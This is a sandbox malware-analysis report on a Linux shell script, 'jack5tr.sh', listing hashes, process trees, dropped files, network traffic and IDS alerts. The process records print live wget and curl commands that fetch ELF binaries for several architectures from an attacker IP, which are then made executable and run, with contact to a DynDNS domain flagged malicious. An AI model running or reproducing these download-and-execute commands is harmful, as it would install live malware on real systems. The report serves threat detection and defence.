File name:

jack5tr.sh

Full analysis: https://app.any.run/tasks/aafccdb8-0a37-4deb-84e6-5bb38c9e1dff
Verdict: Malicious activity
Analysis date: June 21, 2025, 20:02:23
OS: Ubuntu 22.04.2
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5:

ABA76BAD8AB0E1818F993A1FC1C92562

SHA1:

FAB8562EE856C7AA665D54C5E4135908D7B1626B

SHA256:

388F3F81A9CFF7CE1A1F5C1D681329DC0D1374A415759BA64DDB00E1D1F54B46

SSDEEP:

24:vfyd/sN/sk/s7ld/s8anlM/syWfG/sPzD/sFMHZ/sJ/szh/sgsk/s2w6/sDieH:vKG2z5GzB7RcCHK6egsz2w9F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • RUN (PID: 41436)
      • RUN (PID: 41437)
      • RUN (PID: 41438)
      • RUN (PID: 41439)
      • RUN (PID: 41440)
      • RUN (PID: 41546)
      • RUN (PID: 41548)
      • RUN (PID: 41541)
      • RUN (PID: 41547)
  • SUSPICIOUS

    • Starts itself from another location

      • RUN (PID: 41502)
      • RUN (PID: 41615)
    • Executes commands using command-line interpreter

      • sudo (PID: 41397)
      • bash (PID: 41398)
    • Modifies file or directory owner

      • sudo (PID: 41394)
    • Uses wget to download content

      • bash (PID: 41398)
    • Check the Environment Variables Related to System Identification (os-release)

      • curl (PID: 41402)
      • curl (PID: 41442)
      • curl (PID: 41475)
      • curl (PID: 41513)
      • curl (PID: 41550)
      • curl (PID: 41588)
      • curl (PID: 41625)
      • curl (PID: 41654)
      • curl (PID: 41684)
      • curl (PID: 41722)
      • curl (PID: 41752)
      • curl (PID: 41781)
      • curl (PID: 41811)
    • Reads passwd file

      • dumpe2fs (PID: 41423)
      • dumpe2fs (PID: 41433)
      • curl (PID: 41402)
      • curl (PID: 41442)
      • curl (PID: 41475)
      • curl (PID: 41513)
      • curl (PID: 41588)
      • curl (PID: 41550)
      • curl (PID: 41625)
      • curl (PID: 41654)
      • curl (PID: 41684)
      • curl (PID: 41722)
      • curl (PID: 41752)
      • curl (PID: 41781)
      • curl (PID: 41811)
    • Potential Corporate Privacy Violation

      • wget (PID: 41441)
      • wget (PID: 41400)
      • curl (PID: 41402)
      • curl (PID: 41442)
      • wget (PID: 41512)
      • curl (PID: 41513)
      • wget (PID: 41549)
      • curl (PID: 41550)
      • curl (PID: 41588)
      • wget (PID: 41624)
      • wget (PID: 41585)
      • wget (PID: 41653)
      • curl (PID: 41625)
      • wget (PID: 41683)
      • curl (PID: 41654)
      • curl (PID: 41684)
      • wget (PID: 41751)
      • curl (PID: 41752)
      • wget (PID: 41721)
      • curl (PID: 41722)
      • curl (PID: 41781)
      • wget (PID: 41810)
      • wget (PID: 41780)
      • curl (PID: 41811)
    • Connects to the server without a host name

      • wget (PID: 41400)
      • wget (PID: 41441)
      • curl (PID: 41402)
      • curl (PID: 41475)
      • wget (PID: 41472)
      • curl (PID: 41442)
      • wget (PID: 41512)
      • curl (PID: 41550)
      • wget (PID: 41549)
      • curl (PID: 41513)
      • wget (PID: 41585)
      • wget (PID: 41624)
      • curl (PID: 41588)
      • curl (PID: 41654)
      • curl (PID: 41625)
      • wget (PID: 41653)
      • wget (PID: 41721)
      • wget (PID: 41683)
      • curl (PID: 41684)
      • curl (PID: 41722)
      • curl (PID: 41752)
      • wget (PID: 41751)
      • curl (PID: 41781)
      • wget (PID: 41780)
      • wget (PID: 41810)
      • curl (PID: 41811)
    • Executes the "rm" command to delete files or directories

      • RUN (PID: 41503)
      • dash (PID: 41542)
      • dash (PID: 41580)
      • dash (PID: 41616)
  • INFO

    • Checks timezone

      • wget (PID: 41400)
      • dumpe2fs (PID: 41423)
      • dumpe2fs (PID: 41433)
      • wget (PID: 41441)
      • wget (PID: 41472)
      • wget (PID: 41512)
      • wget (PID: 41549)
      • wget (PID: 41585)
      • wget (PID: 41624)
      • wget (PID: 41653)
      • wget (PID: 41683)
      • wget (PID: 41721)
      • wget (PID: 41780)
      • wget (PID: 41751)
      • wget (PID: 41810)
    • Creates file in the temporary folder

      • wget (PID: 41400)
      • curl (PID: 41402)
      • cat (PID: 41434)
      • wget (PID: 41441)
      • curl (PID: 41442)
      • bash (PID: 41466)
      • cat (PID: 41539)
      • wget (PID: 41512)
      • RUN (PID: 41503)
      • curl (PID: 41513)
      • curl (PID: 41475)
      • bash (PID: 41500)
      • curl (PID: 41550)
      • bash (PID: 41577)
      • wget (PID: 41585)
      • curl (PID: 41588)
      • wget (PID: 41549)
      • wget (PID: 41624)
      • curl (PID: 41625)
      • cat (PID: 41649)
      • wget (PID: 41653)
      • bash (PID: 41613)
      • dash (PID: 41616)
      • curl (PID: 41654)
      • cat (PID: 41679)
      • curl (PID: 41684)
      • wget (PID: 41683)
      • curl (PID: 41722)
      • cat (PID: 41747)
      • cat (PID: 41717)
      • wget (PID: 41721)
      • wget (PID: 41751)
      • curl (PID: 41752)
      • wget (PID: 41780)
      • cat (PID: 41776)
      • wget (PID: 41810)
      • cat (PID: 41836)
      • curl (PID: 41811)
      • curl (PID: 41781)
      • cat (PID: 41806)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
282
Monitored processes
152
Malicious processes
3
Suspicious processes
17

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget curl snap-seccomp no specs snap-confine no specs dumpe2fs no specs snap-update-ns no specs dumpe2fs no specs cat no specs chmod no specs run no specs wget run no specs run run no specs run no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs run no specs wget run no specs run run no specs run no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs run no specs run no specs rm no specs mkdir no specs mv no specs chmod no specs dash no specs systemd wget systemd no specs systemd no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs run no specs dash no specs run wget rm no specs mkdir no specs chmod no specs run no specs run no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs run no specs dash no specs rm no specs mkdir no specs chmod no specs run wget run no specs run no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs bash no specs chmod no specs run no specs dash no specs watchdog wget rm no specs mkdir no specs mv no specs chmod no specs watchdog no specs watchdog no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs

Process information

PID
CMD
Path
Indicators
Parent process
41393/bin/sh -c "sudo chown user /home/user/Desktop/jack5tr\.sh && chmod +x /home/user/Desktop/jack5tr\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/jack5tr\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41394sudo chown user /home/user/Desktop/jack5tr.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41395chown user /home/user/Desktop/jack5tr.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41396chmod +x /home/user/Desktop/jack5tr.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41397sudo -iu user /home/user/Desktop/jack5tr.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41398/bin/bash /home/user/Desktop/jack5tr.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41399/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41400wget http://103.20.102.84/x86/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41402/snap/curl/1754/bin/curl -O http://103.20.102.84/x86/snap/curl/1754/bin/curl
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpthread.so.0
/usr/lib/x86_64-linux-gnu/libudev.so.1.7.2
/usr/lib/x86_64-linux-gnu/libdl.so.2
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/snap/curl/1754/lib/libcurl.so.4.8.0
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpthread-2.31.so
/snap/curl/1754/usr/lib/x86_64-linux-gnu/libnghttp2.so.14.19.0
/snap/curl/1754/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.6
41414/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info/snap/snapd/20290/usr/lib/snapd/snap-seccompcurl
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpthread.so.0
/usr/lib/x86_64-linux-gnu/libc.so.6
Executable files
0
Suspicious files
21
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
41400wget/tmp/x86binary
MD5:
SHA256:
41434cat/tmp/RUNo
MD5:
SHA256:
41441wget/tmp/mipsbinary
MD5:
SHA256:
41512wget/tmp/x86_64binary
MD5:
SHA256:
41539cat/tmp/RUNbinary
MD5:
SHA256:
41549wget/tmp/mpslbinary
MD5:
SHA256:
41585wget/tmp/armbinary
MD5:
SHA256:
41624wget/tmp/arm5binary
MD5:
SHA256:
41649cat/tmp/RUNbinary
MD5:
SHA256:
41653wget/tmp/arm6binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
35
TCP/UDP connections
32
DNS requests
149
Threats
179

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
37.19.194.81:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
POST
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
POST
200
185.125.188.59:443
https://api.snapcraft.io/api/v1/snaps/auth/nonces
unknown
binary
54 b
whitelisted
POST
200
185.125.188.54:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
unknown
binary
587 b
whitelisted
POST
200
185.125.188.57:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.4 Kb
whitelisted
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/info/curl?architecture=amd64&fields=architectures%2Cbase%2Cconfinement%2Clinks%2Ccontact%2Ccreated-at%2Cdescription%2Cdownload%2Cepoch%2Clicense%2Cname%2Cprices%2Cprivate%2Cpublisher%2Crevision%2Csnap-id%2Csummary%2Ctitle%2Ctype%2Cversion%2Cwebsite%2Cstore-url%2Cmedia%2Ccommon-ids%2Ccategories
unknown
binary
3.07 Kb
whitelisted
41400
wget
GET
200
103.20.102.84:80
http://103.20.102.84/x86
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.96:80
Canonical Group Limited
US
unknown
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.98:80
Canonical Group Limited
GB
unknown
195.181.175.40:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41400
wget
103.20.102.84:80
unknown
41402
curl
103.20.102.84:80
unknown
41441
wget
103.20.102.84:80
unknown
41442
curl
103.20.102.84:80
unknown
41472
wget
103.20.102.84:80
unknown

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 195.181.175.40
  • 169.150.255.184
  • 212.102.56.178
  • 195.181.170.18
  • 169.150.255.180
  • 207.211.211.27
  • 37.19.194.81
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::107
whitelisted
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.54
  • 185.125.188.57
  • 185.125.188.59
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
whitelisted
google.com
  • 142.250.186.142
  • 2a00:1450:4001:813::200e
whitelisted
4.100.168.192.in-addr.arpa
unknown
mdnsucchim.ddns.net
malicious
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::98
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::2b
whitelisted

Threats

PID
Process
Class
Message
41400
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41402
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41438
RUN
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
41402
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41441
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41442
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41470
RUN
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
41442
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41438
RUN
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
41438
RUN
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
No debug info